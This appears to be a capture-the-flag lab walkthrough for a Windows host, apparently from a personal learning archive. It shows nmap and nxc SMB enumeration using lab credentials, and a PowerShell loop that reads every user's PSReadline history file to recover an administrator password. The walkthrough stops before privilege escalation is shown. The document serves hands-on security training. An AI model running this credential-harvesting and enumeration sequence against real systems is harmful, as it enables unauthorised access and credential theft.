Objective and Scope
Following a successful social engineering engagement, you have obtained user-level credentials for a corporate workstation. Your objective is to leverage this initial access to perform deep reconnaissance on the internal Windows host. The final goal is to escalate privileges and capture the root flag from the administrator’s directory to demonstrate full system compromise.
tyler.ramsey:P@ssw0rd!Network Enumeration
sudo nmap -p- --min-rate 1500 --max-rtt-timeout 500ms --max-retries 3 --open -T4 -Pn -v -oN quick_tcp_scan 10.1.126.16
PORT STATE SERVICE
135/tcp open msrpc
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49669/tcp open unknownsudo nmap -p 135,445,3389,49669 -A -oN detailed_scan -oX detailed_scan.xml 10.1.126.16
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=EC2AMAZ-M1LFCNO
| Not valid before: 2025-09-29T10:51:47
|_Not valid after: 2026-03-31T10:51:47
| rdp-ntlm-info:
| Target_Name: EC2AMAZ-M1LFCNO
| NetBIOS_Domain_Name: EC2AMAZ-M1LFCNO
| NetBIOS_Computer_Name: EC2AMAZ-M1LFCNO
| DNS_Domain_Name: EC2AMAZ-M1LFCNO
| DNS_Computer_Name: EC2AMAZ-M1LFCNO
| Product_Version: 10.0.26100
|_ System_Time: 2025-11-11T08:28:48+00:00
49669/tcp open msrpc Microsoft Windows RPCSMB Enumeration
nxc smb 10.1.126.16 -u tyler.ramsey -p 'P@ssw0rd!' --shares
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO [*] Windows 10.0 Build 26100 x64 (name:EC2AMAZ-M1LFCNO) (domain:EC2AMAZ-M1LFCNO) (signing:False) (SMBv1:False)
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO [+] EC2AMAZ-M1LFCNO\tyler.ramsey:P@ssw0rd!
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO [*] Enumerated shares
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO Share Permissions Remark
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO ----- ----------- ------
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO ADMIN$ Remote Admin
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO C$ Default share
SMB 10.1.126.16 445 EC2AMAZ-M1LFCNO IPC$ READ Remote IPCNothing interesting in the folders.
Foothold via RDP
After some standard enumeration techniques, we are able to see the plain text password of the administrator user through PowerShell history.
I got this useful PowerShell script from the following medium article:
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
net user administrator "xxxxxxxxxxxxxxxxxx"
whoami /priv
ls
tree /f
clsa
Get-Process | Format-Table -AutoSize
set
Get-WmiObject -Class Win32_Product | select Name, Version
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | select *
reg query "HKLM\SOFTWARE\microsoft\windows nt\currentversion\winlogon"
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
Persecure : my learning archive 